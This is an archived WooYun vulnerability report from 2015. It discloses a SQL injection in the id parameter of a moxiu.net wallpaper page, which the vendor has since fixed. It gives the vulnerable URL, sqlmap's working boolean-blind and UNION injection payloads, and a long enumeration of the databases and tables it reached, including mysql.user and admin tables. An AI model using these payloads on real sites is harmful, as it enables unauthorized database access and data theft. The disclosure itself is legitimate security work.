当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102715

漏洞标题:魔秀某站注入点可跨库大量信息侧漏

相关厂商:moxiu.com

漏洞作者: Ton7BrEak

提交时间:2015-03-21 10:31

修复时间:2015-03-30 14:09

公开时间:2015-03-30 14:09

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-21: 细节已通知厂商并且等待厂商处理中
2015-03-23: 厂商已经确认,细节仅向厂商公开
2015-03-30: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

魔秀某站注入点可跨库,大量信息侧漏

详细说明:

问题出现在这个站点上面http://wallpaper-sogou.open.moxiu.net/
http://wallpaper-sogou.open.moxiu.net/index.php?do=Album.Show&id=20170

sqlmap identified the following injection points with a total of 281 HTTP(s) req
uests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: do=Album.Show&id=20170' AND 2186=2186 AND 'OLmM'='OLmM
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (20) - 3 columns
    Payload: do=Album.Show&id=-4491' UNION ALL SELECT 10,CONCAT(0x716a626a71,0x7
57948776a554d684766,0x71706b7a71),10#
    Vector:  UNION ALL SELECT 10,[QUERY],10#
---


002.jpg

漏洞证明:

1、数据库、系统信息

001.jpg


2、数据库用户+密码

003.jpg


3、数据库数据信息

Database: coop_diy
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| theme_queue | 49198   |
+-------------+---------+
Database: coop_diy_mxt_project
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| mxt_project       | 230570  |
| project_statistic | 144104  |
| mxt_theme_queue   | 1       |
+-------------------+---------+
Database: coop_new
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| coop_log  | 10      |
| coop_user | 1       |
+-----------+---------+
Database: diy2_stat_platform
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| platformlogs | 57      |
| packinfos    | 3       |
+--------------+---------+
Database: goodthemelist
+-------+---------+
| Table | Entries |
+-------+---------+
| list  | 174503  |
+-------+---------+
Database: imoxiu_mocase
+------------+---------+
| Table      | Entries |
+------------+---------+
| apps       | 21326   |
| image_logs | 11662   |
| orders     | 5643    |
| notice     | 48      |
| active     | 28      |
| settings   | 1       |
+------------+---------+
Database: imoxiu_mocase_test
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| image_logs  | 1458    |
| orders      | 671     |
| client_logs | 31      |
| notice      | 23      |
| active      | 4       |
| apps        | 3       |
| settings    | 1       |
+-------------+---------+
Database: iphone_stat
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| livencounts   | 803233  |
| phoneinfos    | 68483   |
| channelcounts | 65625   |
| usercounts    | 12054   |
| feedbacks     | 814     |
+---------------+---------+
Database: list_diy
+-------+---------+
| Table | Entries |
+-------+---------+
| lists | 1016    |
+-------+---------+
Database: mx_android_stat
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| phoneinfos   | 680014  |
| livencounts  | 20295   |
| installs     | 11327   |
| uptimecounts | 3547    |
| curhomes     | 881     |
+--------------+---------+
Database: mx_apps_prize
+------------+---------+
| Table      | Entries |
+------------+---------+
| `user`     | 236     |
| prizeasign | 52      |
| prizeAdr   | 2       |
| active     | 1       |
+------------+---------+
Database: mx_diy_android
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| phonetypelog     | 87      |
| user_archive_log | 48      |
| projectlog       | 22      |
| userlog          | 3       |
+------------------+---------+
Database: mx_mobile
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| topic_theme | 168     |
| notice      | 30      |
| topic       | 16      |
+-------------+---------+
Database: mx_screen
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| mx_fodder       | 503     |
| mx_thumb        | 503     |
| mx_comment      | 31      |
| mx_fodder_theme | 14      |
+-----------------+---------+
Database: mx_wallpaper2
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| wp_log_view    | 7073985 |
| wp_log_down    | 1300039 |
| wp_log_apply   | 613810  |
| wp_log_onekey  | 372756  |
| wp_log_fav     | 60193   |
| wp_items       | 50092   |
| wp_comment     | 43801   |
| wp_items_copy2 | 34180   |
| wp_items_copy  | 19706   |
| wp_items_test  | 16232   |
| wp_items_new2  | 14721   |
| wp_item        | 9058    |
| wp_album       | 1197    |
| wp_log_stat    | 793     |
| wp_widget      | 500     |
| wp_notice      | 321     |
| wp_tag         | 99      |
| wp_cates       | 44      |
| wp_social      | 7       |
| test           | 1       |
+----------------+---------+
Database: MXT_Kaqiu
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| themeToHuaWeiFtp  | 16987   |
| MXT_Theme_Project | 4597    |
| mxt_material2     | 276     |
| `user`            | 1       |
+-------------------+---------+
Database: mysql
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| help_relation | 993     |
| help_topic    | 506     |
| help_keyword  | 452     |
| help_category | 38      |
| `user`        | 12      |
| db            | 10      |
+---------------+---------+
Database: repack_diy
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| mxt_project | 51501   |
| repacks     | 31291   |
+-------------+---------+
Database: stat_android
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| livencounts   | 244     |
| uptimecounts  | 24      |
| phoneinfos    | 15      |
| installs      | 14      |
| curhomes      | 11      |
| channels      | 5       |
| setupdates    | 2       |
| channelcounts | 1       |
+---------------+---------+


Database: mx_admin
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| ad_audit_record         | 1617775 |
| android_weather         | 40980   |
| ad_edmail               | 38202   |
| ad_log                  | 10317   |
| ad_audit_allocate       | 9790    |
| ad_violate_uid          | 4110    |
| ad_user_blacklist       | 2831    |
| ad_audit_stat           | 2738    |
| ad_audit_theme          | 1581    |
| ad_censor               | 1492    |
| ad_theme_week           | 1011    |
| ad_theme_second         | 723     |
| ad_theme_search_down    | 482     |
| ad_theme_day            | 414     |
| ad_stat                 | 263     |
| ad_inspect_stat         | 242     |
| ad_user_verify          | 230     |
| ad_user_week            | 230     |
| android_data_log        | 211     |
| ad_auth_log             | 206     |
| ad_inspect_schedule     | 164     |
| ad_auth_user_log        | 134     |
| ad_auth_theme_audit     | 119     |
| ad_theme_digest         | 109     |
| ad_commend_day          | 108     |
| android_theme_allocated | 95      |
| ad_comment              | 88      |
| ad_blog                 | 69      |
| ad_theme_week_android   | 55      |
| android_rmd_soft        | 54      |
| ad_auth_theme           | 50      |
| ad_portal_friendlinks   | 50      |
| ad_soft_package         | 44      |
| ad_chinamobile          | 33      |
| android_topic           | 33      |
| ad_user_space           | 26      |
| ad_tags                 | 24      |
| ad_auth_user            | 23      |
| android_home            | 23      |
| mobile_ad               | 22      |
| ad_portal_bannar        | 18      |
| mobile_search_fail      | 10      |
| mobile_cate_img         | 9       |
| ad_theme_week_symbian   | 8       |
| ad_commend_week_android | 4       |
| android_notice          | 4       |
| android_theme_reserve   | 4       |
| ad_commend_week_symbian | 3       |
| ad_audit_rule           | 1       |
| mobile_ad_rule          | 1       |
+-------------------------+---------+


Database: mx_admin_v3
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| ad_audit_record           | 1618961 |
| ad_log                    | 32775   |
| ad_audit_allocate         | 10125   |
| ad_violate_uid            | 4146    |
| ad_user_verify            | 4050    |
| ad_audit_theme            | 3145    |
| ad_audit_stat             | 2738    |
| ad_censor                 | 1496    |
| ad_feed                   | 1082    |
| ad_auth_mood              | 697     |
| ad_user_imgs              | 520     |
| ad_auth_theme_audit       | 350     |
| ad_inspect_stat           | 242     |
| ad_album_global_rmd       | 239     |
| ad_rec_mxstar             | 220     |
| ad_auth_album             | 217     |
| ad_auth_log               | 216     |
| ad_theme_second           | 182     |
| ad_rec_theme              | 133     |
| ad_comment                | 88      |
| ad_rec_mood               | 82      |
| ad_friendlinks            | 74      |
| ad_album_rmd              | 73      |
| ad_auth_theme             | 68      |
| ad_theme_digest           | 66      |
| ad_tags                   | 57      |
| ad_delete_theme           | 52      |
| ad_user_record            | 46      |
| ad_rec_mood_gather        | 37      |
| ad_admin                  | 30      |
| ad_portal_bannar          | 24      |
| ad_auth_user              | 23      |
| ad_admintype              | 17      |
| ad_portal_albumbannar     | 15      |
| ad_rec_theme_gather       | 14      |
| ad_album_cate             | 13      |
| ad_bannar                 | 12      |
| ad_client_qqmobilebannar  | 12      |
| ad_portal_albumbannar_new | 12      |
| ad_spec                   | 6       |
| ad_spec_cat               | 6       |
| ad_portal_bannar_new      | 5       |
| ad_auth_user_log          | 3       |
| ad_audit_rule             | 1       |
+---------------------------+---------+

修复方案:

你们比我更专业

版权声明:转载请注明来源 Ton7BrEak@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-23 10:08

厂商回复:

感谢

最新状态:

2015-03-30:已修复

漏洞评价:

评论